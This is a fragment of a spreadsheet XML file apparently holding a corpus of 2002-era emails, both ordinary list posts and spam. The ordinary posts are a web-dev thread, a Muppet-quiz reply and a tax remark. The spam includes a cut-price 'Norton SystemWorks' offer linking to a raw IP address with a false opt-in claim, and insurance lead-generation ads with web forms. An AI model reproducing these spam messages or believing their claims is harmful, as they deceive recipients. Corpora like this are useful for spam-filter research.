 &gt; &gt; With most languages you parse the submitted form data and should come
 &gt; &gt; out with either variables or an array / hash, which you then work with
 &gt; &gt; and name whatever you like.
 &gt;
 &gt; IIRC, if the query string contains
 &gt;
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">Hey, it's not easy being green.
 leslie
 Leslie Ellen Jones, Ph.D.
 Jack of All Trades and Doctor of Folklore
 lejones@ucla.edu
 "Truth is an odd number" -- Flann O'Brien
   ----- Original Message ----- 
   From: Dino 
   To: zzzzteana@yahoogroups.com 
   Sent: Thursday, August 22, 2002 10:13 AM
   Subject: RE: [zzzzteana] Which Muppet Are You?
   Damn kermit...boring...
   Wanna be rizzo he's the coolest
   Dino
         Yahoo! Groups Sponsor 
               ADVERTISEMENT
   To unsubscribe from this group, send an email to:
   forteana-unsubscribe@egroups.com
   Your use of Yahoo! Groups is subject to the Yahoo! Terms of Service. 
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fwd: Norton makes the BEST software available, now ONLY $29.99! 32053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</si>
  <si>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&lt;title&gt;Does Your Computer Need an Oil Change&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"1"&gt;
   &lt;tr&gt;
     &lt;td width=3D"538" height=3D"1" align=3D"center" bgcolor=3D"#FF0000"&gt;&lt;b=
 &gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#FFFFFF"&gt;Do
       You Care About Your Computer?&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"151"&gt;
   &lt;tr&gt;
     &lt;td width=3D"530" height=3D"145" bgcolor=3D"#0000FF"&gt;&lt;b&gt;&lt;font face=3D"=
 Tahoma" size=3D"5" color=3D"#FFFF99"&gt;Symantec&lt;/font&gt;&lt;font color=3D"#006600=
 " face=3D"Verdana" size=3D"7"&gt;&lt;br&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D=
 "7" color=3D"#FFFFFF"&gt;SystemWorks
       2002&lt;/font&gt;&lt;/i&gt;&lt;font size=3D"4" face=3D"Verdana"&gt;&lt;br&gt; &lt;/font&gt;&lt;font f=
 ace=3D"Tahoma" size=3D"5" color=3D"#FFFF99"&gt;&lt;u&gt;Professional
       Edition&lt;/u&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"26"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"20" align=3D"center" bgcolor=3D"#FF0000"&gt;=
 &lt;b&gt;&lt;font face=3D"Verdana" color=3D"#FFFFFF"&gt;From
       the Creators of the #1 Rated AntiVirus Software!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"77"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"71" align=3D"center" bgcolor=3D"#0000FF"&gt;=
 &lt;b&gt;&lt;font face=3D"Times New Roman" size=3D"4" color=3D"#FFFFFF"&gt;&lt;br&gt;&lt;/font&gt;=
 &lt;font face=3D"Arial" color=3D"#FFFFFF" size=3D"4"&gt;This
       &lt;u&gt;UNBEATABLE&lt;/u&gt; software suite comes with EVERY
       program you'll ever need to answer the problems or threats that your
       computer faces each day of it's Life!&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Arial"=
  color=3D"#FFFFFF"&gt;&lt;br&gt;&lt;/font&gt;&lt;font face=3D"Lucida Sans Unicode" color=3D"=
 #CC0000"&gt; &lt;br&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" color=3D"#FFFF99"&gt;Included i=
 n this magnificent deal
       are the following programs:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"138"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"132" bgcolor=3D"#FFFFFF" bordercolor=3D"#=
 FF0000" bordercolorlight=3D"#FF0000" bordercolordark=3D"#000000" style=3D"=
 border: 1 solid #0000FF"&gt;&lt;font color=3D"#FF0000"&gt;&lt;font size=3D"4" face=3D"=
 Tahoma"&gt;Norton
       AntiVirus=FFFFFF99 2002 - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;b=
 &gt;THE #1
       ANTI-VIRUS PROTECION EVER!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Tahoma=
 "&gt;&lt;br&gt;Norton Utilities=FFFFFF99 2002
       - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;b&gt;DIAGNOSE ANY PROBLEM WI=
 TH YOUR
       SYSTEM!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Tahoma"&gt;&lt;br&gt;
       &lt;font size=3D"4"&gt;Norton Ghost=FFFFFF99 2002 - &lt;/font&gt;&lt;/font&gt;&lt;font fa=
 ce=3D"Tahoma" size=3D"2"&gt;&lt;b&gt;MAKES
       BACKING UP YOUR VALUABLE DATA EASY!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D=
 "Tahoma"&gt;&lt;br&gt;
       Norton CleanSweep=FFFFFF99 2002 - &lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" si=
 ze=3D"2"&gt;ELIMINATES EXCESS
       DATA INSTANTLY!&lt;/font&gt;&lt;/b&gt;&lt;font size=3D"4" face=3D"Tahoma"&gt;&lt;br&gt;
       Norton WinFax=FFFFFF99 Basic - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"=
 2"&gt;&lt;b&gt;TURNS YOUR
       CPU INTO A FAX MACHINE!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Trebuchet=
  MS"&gt;&lt;br&gt;
       &lt;/font&gt;
       &lt;font size=3D"4" face=3D"Tahoma"&gt;GoBack=FFFFFFAE 3 Personal - &lt;/font=
 &gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;HELPS
       PREVENT YOU FROM MAKING ANY MISTAKES!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"63"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"57" align=3D"center" bgcolor=3D"#FF0000"&gt;=
 &lt;b&gt;&lt;font face=3D"Verdana" size=3D"4" color=3D"#FFFF99"&gt;*ALL
       this sells at the store for $99.95*&lt;/font&gt;&lt;font face=3D"Verdana" siz=
 e=3D"5" color=3D"#FF0000"&gt;&lt;BR&gt; &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"6" co=
 lor=3D"#FFFFFF"&gt;Get it
       NOW for ONLY $29.99!&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D=
 "#FF0000"&gt;&lt;br&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#FFFF99=
 "&gt;with
       FREE SHIPPING!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"1" width=3D"538" height=3D"60" bgcolor=3D"#333333" border=
 color=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"54" align=3D"center" bgcolor=3D"#0000FF"&gt;=
 &lt;font size=3D"6" color=3D"#FFFFFF" face=3D"Impact"&gt;&lt;a href=3D"http://61.15=
 1.247.39/erik/" style=3D"color: #FFFFFF"&gt;CLICK
       HERE to order NOW!&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font face=3D"System" color=3D"#FF0000"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Limited Time Offer. When we
 run out it's gone, so get it while it's HOT!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;table border=3D"0" width=3D"538" bgcolor=3D"#FFFFFF" height=3D"33"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"29" align=3D"center" bgcolor=3D"#0000FF"&gt;=
 &lt;b&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFFFF"&gt;CALL
       1-800-861-1481 &amp;amp; ORDER NOW!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;table border=3D"1" width=3D"538" height=3D"10" bordercolorlight=3D"#66666=
 6" bordercolordark=3D"#333333"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"4" align=3D"center"&gt;&lt;font face=3D"Tahoma"=
  size=3D"1" color=3D"#000080"&gt;Your
       email address was obtained from an opt-in list. IEAC (International =
 Email Abuse
       Council)&amp;nbsp;Approved List&lt;br&gt;
       &amp;nbsp;Type Code - EASTUS-23t95d.&amp;nbsp;&amp;nbsp;If you wish to be unsubs=
 cribed from
       this list, please &lt;a style=3D"color: #800000" href=3D"http://61.151.=
 247.39/erik/remove.asp"&gt;Click
       here&lt;/a&gt;. We do not condone spam in any shape or form. We appreciate=
  your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_40E492_01C20813.27572AA0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Life Insurance Settlements: A unique dual-income opportunity
  =09
 A Life Settlement is the sale of a life insurance policy=20
 that gives the policy owner a significant cash settlement. =09
  =09
  Earn substantial referral fees=0A=
 Sell more product=0A=
 Renewal Commissions of
 Original Policy Stay Intact=0A=
 A Value-Add to Your Existing Business=09
 DON'T CHANGE YOUR CURRENT WAY OF DOING BUSINESS
 Turn your existing book into an additional income stream=20
 with very little effort. =09
  =09
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 =20
 Call or e-mail &lt;mailto:info@vbimail.com&gt;  us today!
  800-871-9440
 or visit us online at: www.Life-Settlements-Online.com
 &lt;http://www.life-settlements-online.com&gt;=20
  =20
 We don't want anybody to receive our mailings who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.Insurancemail.net
 &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_40E492_01C20813.27572AA0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;A Unique Dual Income Opportunity&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"2" =
 bgcolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;img src=3D"http://iiq.us/images/vbi/20020411-1e.jpg" =
 width=3D"550" height=3D"361" alt=3D"Life Insurance Settlements: A unique =
 dual-income opportunity"&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/vbi/spacer.gif" =
 width=3D"2" height=3D"2"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;
             A &lt;font color=3D"#000066"&gt;&lt;b&gt;Life Settlement&lt;/b&gt;&lt;/font&gt; is =
 the sale of a life insurance policy &lt;br&gt;
             that gives the policy owner a significant cash =
 settlement.&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/vbi/spacer.gif" =
 width=3D"2" height=3D"2"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/vbi/20020410-3.gif" width=3D"455" =
 height=3D"100" alt=3D"Earn substantial referral fees&amp;#10;Sell more =
 product&amp;#10;Renewal Commissions of Original Policy Stay Intact&amp;#10;A =
 Value-Add to Your Existing Business"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;
             &lt;b&gt;&lt;font color=3D"#000066"&gt;DON'T CHANGE YOUR CURRENT WAY OF =
 DOING BUSINESS&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             Turn your existing book into an &lt;b&gt;additional income =
 stream&lt;/b&gt; &lt;br&gt;
             with very little effort.&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/vbi/spacer.gif" =
 width=3D"1" height=3D"8"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20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face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#FFFFFF"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"info@vbimail.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"InsuranceIQ Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Call or &lt;a href=3D"mailto:info@vbimail.com"&gt;e-mail&lt;/a&gt; us =
 today!&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/vbi/20020410-4.gif" =
 width=3D"540" height=3D"67" alt=3D"800-871-9440"&gt;&lt;b&gt;&lt;br&gt;
             or visit us online at: &lt;a =
 href=3D"http://www.life-settlements-online.com"&gt;www.Life-Settlements-Onli=
 ne.com&lt;/a&gt;&lt;br&gt;
             &amp;nbsp; &lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;=20
       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt; We =
 don't want anybody=20
         to receive our mailings who does not wish to receive them. This =
 is professional=20
         communication sent to insurance professionals. To be removed =
 from this=20
         mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go =
 here: &lt;a href=3D"http://www.Insurancemail.net"&gt;=20
         http://www.Insurancemail.net&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal=20
   Notice&lt;/a&gt; &lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_40E492_01C20813.27572AA0--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-09-03 at 16:31, Adam L. Beberg wrote:
 &gt; It was a great many years before their were federal taxes in the US.
 And during said period there were more than a few serious depressions.
 Amazing what economies tend to do with or without taxes.
 Luis
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: OpenWave
</t>
  </si>
  <si>
    <t xml:space="preserve">OPWV and a bad moon rising.
 &gt; Zacks Issues Recommendations on 4 Stocks: DYN, MANU, SWY and OPWV
 &gt; 
 &gt; PR Newswire, Thursday, July 25, 2002 at 06:03
 &gt; 
 &gt; /FROM PR NEWSWIRE CHICAGO 888-776-6551/ [STK] DYN MANU SWY OPWV [IN] FIN MLM [SU] INO -- 
 WITH PHOTO -- TO BUSINESS EDITOR:
 &gt; 
 &gt; Zacks Issues Recommendations on 4 Stocks: DYN, MANU, SWY and OPWV
 &gt; 
 &gt; CHICAGO, July 25 /PRNewswire/ -- Zacks.com releases details on four more 
 stocks that are part of their exclusive list of Stocks to Sell Now. These 
 stocks are currently rated as a Zacks Rank #5 (Strong Sell). These stocks have 
 been proven to under-perform the S&amp;P 500 by 89.8% since its inception in 1980. 
 While the rest of Wall Street continued to tout stocks during the market declines 
 of the last few years, we were telling our customers which stocks to sell in order 
 to save themselves the misery of unrelenting losses. Among the #5 ranked stocks today 
 we highlight the following companies: Dynegy, Inc. (NYSE:DYN) and Manugistics Group, Inc. 
 (NASDAQ:MANU), Safeway, Inc. (NYSE:SWY) and Openwave Systems, Inc. (NASDAQ:OPWV). To see 
 the full Zacks #5 Ranked list of Stocks to Sell Now then visit http://stockstosellpr.zacks.com .
 -- 
 Gregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com
 Endeavors Technology, Inc. | cell: +1.714.928.5476 | http://endeavors.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free InsBuyer.com Agency Listing
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_346C22_01C1F83E.20E71340
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Free InsBuyer.com Agency Listing Free InsBuyer.com Agency Listing
  200,000 Visits and 10,00 leads generated EVERY MONTH!
  200,000 Visits and 10,00 leads generated EVERY MONTH!	
 Life Insurance	 Annuities	 
 Disability Insurance	 Health Insurance	 
 Long Term Care Insurance	 Mortgage Insurance	 
 Estate Planning	 Medicare Supplement Insurance	 
 Pre-Paid Legal	 Dental nsurance	 
 Travel Insurance	 Viatical Settlements	 
 Auto Insurance	 Home Insurance	 
  Call or e-mail &lt;mailto:drogers@insbuyer.com&gt;  us today!
  877-596-8504
 ? or ?
 Please fill out the form below for a free listing	 
 Name:	  	
 Company:	  	
 Address:	  	
 City:	  	State:	  	Zip:	  	
 Phone:	  	
 E-mail:	  	
 Website:	  	 	
 InsBuyer.com - The Insurance Buyer's Guide &lt;http://www.insbuyer.com&gt;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------=_NextPart_000_346C22_01C1F83E.20E71340
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Free InsBuyer.com Agency Listing&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"2" =
 bgcolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#000066"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/insb/20020501-101.gif" width=3D"269" =
 height=3D"169" alt=3D"Free InsBuyer.com Agency Listing"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/insb/20020501-102.gif" width=3D"281" =
 height=3D"169" alt=3D"Free InsBuyer.com Agency Listing"&gt;&lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/insb/20020501-103.gif" width=3D"550" =
 height=3D"112" alt=3D"200,000 Visits and 10,00 leads generated EVERY =
 MONTH!"&gt;&lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/insb/20020501-104.gif" width=3D"550" =
 height=3D"73" alt=3D"200,000 Visits and 10,00 leads generated EVERY =
 MONTH!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td =
 background=3D"http://63.211.81.87/images/insb/20020501-105.gif"&gt;&lt;br&gt;
             &lt;table border=3D"0" width=3D"90%" cellspacing=3D"0" =
 cellpadding=3D"3" align=3D"center"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Life =
 Insurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;Annuities&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Disability =
 Insurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Health =
 Insurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Long Term Care =
 Insurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Mortgage =
 Insurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Estate =
 Planning&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Medicare Supplement =
 Insurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Pre-Paid =
 Legal&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Dental =
 nsurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Travel =
 Insurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Viatical =
 Settlements&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Auto =
 Insurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;font =
 face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;Home =
 Insurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;&lt;br&gt;
             &amp;nbsp;Call or &lt;a href=3D"mailto:drogers@insbuyer.com"&gt;&lt;font =
 color=3D"#00CCFF"&gt;e-mail&lt;/font&gt;&lt;/a&gt; us today!&lt;br&gt;
             &lt;img src=3D"http://63.211.81.87/images/insb/20020501-2.gif" =
 width=3D"544" height=3D"66" alt=3D"877-596-8504"&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#CCCCCC"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"7" align=3D"center" =
 bgcolor=3D"#333333"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#FFFFFF"&gt;Please fill =
 out the form below for a free listing&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
